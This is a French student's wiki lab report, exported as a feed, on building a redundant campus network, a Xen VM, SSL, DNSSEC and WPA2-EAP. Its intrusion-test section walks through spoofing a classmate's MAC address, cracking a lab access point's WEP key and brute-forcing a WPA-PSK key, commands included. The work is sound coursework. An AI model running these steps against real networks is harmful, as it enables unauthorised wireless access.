<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Ebourre</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Ebourre"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Ebourre"/>
		<updated>2026-04-24T15:56:12Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23414</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23414"/>
				<updated>2015-11-27T15:35:09Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;1&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;default&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Modification du fichier /etc/apt/sources.list : &lt;br /&gt;
rajout de contrib non-free&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/network/interfaces : &lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static &lt;br /&gt;
     address 172.20.106.6&lt;br /&gt;
     netmask 255.255.255.0&lt;br /&gt;
     gateway 172.20.106.254&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/resolv.conf : &lt;br /&gt;
nameserver 193.48.57.34&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install firmware-linux-nonfree&lt;br /&gt;
apt-get remove network-manager&lt;br /&gt;
apt-get install broadcom-sta-dkms&lt;br /&gt;
modprobe wl&lt;br /&gt;
modprobe -r b44 b43 b43legacy ssb brcmsmac&lt;br /&gt;
modprobe -r wl&lt;br /&gt;
modprobe wl*dmseg&lt;br /&gt;
dmseg&lt;br /&gt;
ifconfig -a &lt;br /&gt;
reboot&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
code :&lt;br /&gt;
airmon -ng start wlan1 ==&amp;gt; cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin&lt;br /&gt;
soltion : apt-get install firmware-ralink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0&lt;br /&gt;
&lt;br /&gt;
Je ré-ouvre une mon0.&lt;br /&gt;
&lt;br /&gt;
J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.&lt;br /&gt;
&lt;br /&gt;
Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.&lt;br /&gt;
&lt;br /&gt;
Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)&lt;br /&gt;
&lt;br /&gt;
code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.&lt;br /&gt;
&lt;br /&gt;
Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va commencer par créer un dictionnaire  de clé : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main (void)&lt;br /&gt;
{&lt;br /&gt;
    int i=0;&lt;br /&gt;
    while(i&amp;lt;100000000)&lt;br /&gt;
    {&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
        i++;&lt;br /&gt;
    }&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite récupérer le handshake :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
df&lt;br /&gt;
fdisk -l&lt;br /&gt;
mkfs /dev/sda1&lt;br /&gt;
mount /dev/sda1 /mnt&lt;br /&gt;
cp handshake-01.cap /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que le fichier est sur pifou, je lance le traitement :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w dico.txt handshake-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : Connexion sur Weppes puis ssh root@193.57.48.183&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je commence par installer sur la machine virtuellepostfix et bsd-mailx :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install postfix&lt;br /&gt;
vim /etc/aliases ==&amp;gt; rajout d'une ligne admin:   root&lt;br /&gt;
newaliases&lt;br /&gt;
apt-get install mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. &lt;br /&gt;
&lt;br /&gt;
En utilisant &amp;quot;p&amp;quot; je peux l'afficher.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Sécurisation de site web par certificat&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant je vais réclamer mon certificat : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Je vais sur le site de gandi&lt;br /&gt;
Je clique sur Certificat SSL qui est actuellement inactif&lt;br /&gt;
Je vais dans la FAQ et je cherche comment générer une CSR ? &lt;br /&gt;
Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM&lt;br /&gt;
Country Name (2 letter code) [AU]: FR&lt;br /&gt;
State or Province Name (full name) [Some-State]: Nord&lt;br /&gt;
Locality Name (eg, city) []: Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille&lt;br /&gt;
Organizational Unit Namec SSLCertificateChainFile.  (eg, section) []: &lt;br /&gt;
Common Name (eg, YOUR name) []: hunt3r.lol&lt;br /&gt;
Email Address []: admin@hunt3r.lol&lt;br /&gt;
A challenge password []: &lt;br /&gt;
An optional company name []:&lt;br /&gt;
Il me génère donc deux fichiers, le .csr et le .key&lt;br /&gt;
J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.&lt;br /&gt;
&lt;br /&gt;
Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)&lt;br /&gt;
Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.&lt;br /&gt;
Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.&lt;br /&gt;
Même chose pour les certificats intermédiaire.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je peux commencer alors la configuration d'apache2 avec mon certificat :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cd /etc/apache2/sites-available&lt;br /&gt;
vim default-ssl.conf&lt;br /&gt;
                SSLCertificateFile      /root/Werewolf.cer&lt;br /&gt;
                SSLCertificateKeyFile /root/Werewolf.key&lt;br /&gt;
                #SSLCertificateChainFile /root/WerewolfInter.cer&lt;br /&gt;
&lt;br /&gt;
3 commandes me permettent de mettre en route le tout :&lt;br /&gt;
a2ensite default-ssl&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
service apache2 restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Sécurisation de serveur DNS par DNSSEC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cd /etc/bind&lt;br /&gt;
vim named.conf.options ==&amp;gt; rajout de l'option dnssec-enable yes;&lt;br /&gt;
mkdir hunt3r.dnssec&lt;br /&gt;
cd hunt3r.dnssec&lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE -r /dev/urandom hunt3r.dnssec&lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -n ZONE -r /dev/urandom hunt3r.dnssec&lt;br /&gt;
Je renomme les fichiers créé en : &lt;br /&gt;
    *hunt3r-ksk.key&lt;br /&gt;
    *hunt3r-ksk.private&lt;br /&gt;
    *hunt3r-zsk.key&lt;br /&gt;
    *hunt3r-zsk.private&lt;br /&gt;
J'inclus dans le fichier db.hunt3r : &lt;br /&gt;
    *$include /etc/bind/hunt3r.dnssec/hunt3r-ksk.key&lt;br /&gt;
    *$include /etc/bind/hunt3r.dnssec/hunt3r-zsk.key&lt;br /&gt;
dnssec-signzone -o hunt3r.lol -k hunt3r-ksk ../db.hunter hunt3r-zsk&lt;br /&gt;
Modification du fichier named.conf.local  ==&amp;gt; db.hunt3r.signed&lt;br /&gt;
service bind9 restart&lt;br /&gt;
Copie de la clé KSK sur le site de gandi dans l'onglet gérer DNSSEC&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Sécurisation Wifi par WPA2-EAP &amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant je vais m'attaquer à la protection de l'accès à la borne Wifi de façon à ce qu'il soit controlé par WPA2-EAP. &lt;br /&gt;
Pour cela je me connecte à ma VM et je réalise la configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install FreeRadius&lt;br /&gt;
cd /etc/bind/freeradius&lt;br /&gt;
Modification de 3 fichiers :&lt;br /&gt;
vim eap.conf&lt;br /&gt;
    default-eap-type = peap&lt;br /&gt;
vim client.conf&lt;br /&gt;
    client 172.20.99.0/24&lt;br /&gt;
    {&lt;br /&gt;
       secret = secret_Werewolf&lt;br /&gt;
       shortname = wifi&lt;br /&gt;
    }&lt;br /&gt;
vim users &lt;br /&gt;
On enlève les commentaires au niveau de John Doe et de son mot de passe, de cette façon on aura un utilisateur.&lt;br /&gt;
&lt;br /&gt;
telnet 172.20.99.5&lt;br /&gt;
aaa new-model&lt;br /&gt;
aaa authentication login eap_Werewolf group radius_Werewolf&lt;br /&gt;
radius-server host 193.48.57.8 auth-port 1812 acct-port 1813 key secret_Werewolf&lt;br /&gt;
aaa group server radius radius_Werewolf&lt;br /&gt;
server 193.48.57.8 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_WEREWOLF&lt;br /&gt;
  vlan 8&lt;br /&gt;
  authentication open eap eap_Werewolf&lt;br /&gt;
  authentication network-eap eap_Werewolf&lt;br /&gt;
  authentication key-management wpa&lt;br /&gt;
&lt;br /&gt;
encryption vlan 8 mode ciphers aes-ccm tkip&lt;br /&gt;
&lt;br /&gt;
ssid SSID_WEREWOLF&lt;br /&gt;
int dot11Radio 0.8&lt;br /&gt;
en &lt;br /&gt;
encapsulation dot1Q 8&lt;br /&gt;
bridge-group 8&lt;br /&gt;
exit       &lt;br /&gt;
int gig0.8&lt;br /&gt;
en&lt;br /&gt;
encapsulation dot1Q 8&lt;br /&gt;
bridge-group 8&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
Pour avoir accès depuis mon PC :&lt;br /&gt;
&lt;br /&gt;
vim etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
    auto wlan0&lt;br /&gt;
    iface wlan0 inet static&lt;br /&gt;
    wpa-ssid SSID_WEREWOLF&lt;br /&gt;
    wpa-key-mgmt WPA-EAP&lt;br /&gt;
